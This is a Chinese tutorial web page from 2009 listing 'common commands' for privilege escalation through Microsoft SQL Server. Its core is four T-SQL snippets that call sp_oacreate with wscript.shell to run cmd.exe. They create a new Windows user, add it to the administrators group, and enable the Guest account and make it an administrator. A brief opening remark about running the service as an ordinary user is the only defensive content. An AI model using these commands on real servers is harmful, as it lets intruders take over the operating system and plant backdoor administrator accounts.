当前位置: 首页 > 图文教程 > 数据库 > MSSQL > SQL 提权 常用命令

MSSQL
MS SQL数据库备份和恢复存储过程
深入SQL SERVER 2000的内存管理机制(三)
深入SQL SERVER 2000的内存管理机制(二)
全接触sqlserver异常与孤立事务
理解odbc和ole
sql优化器探讨
SQL备份并压缩备份文件
SQL SERVER 2000 SP4新特性概述
SQL服务器外网IP测试故障解决
保卫你的SQL Server数据库
SQL Server密码安全追踪和存储
SQL Server的链接服务器技术小结
一些Select检索高级用法
SQL Server中发送邮件的新方式
深入探讨SQL Server 2000对XML的支持
SQLServer和Oracle的常用函数对比
SQL Server的用户及权限
SQL注入攻击通杀
SQL Server 安全检查列表
SQL Server中处理死锁

MSSQL 中的 SQL 提权 常用命令


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-13   浏览: 91 ::
收藏到网摘: n/a

SQL 提权 常用命令,大家可以考虑下将sqlserver的服务运行权限设置为普通用户,即可防止下面的提权。 1、连接数据库
driver={SQL Server};server=服务器IP;uid=用户名;pwd=密码;database=数据库名
2、添加新用户
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'
3、把用户加到管理组
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'
4、激活GUEST用户
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user guest /active:yes'
5、把Guest加到管理组
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup Administrators Guest /add'
关于防范方法,可以参考软晨学习网服务器安全设置栏目。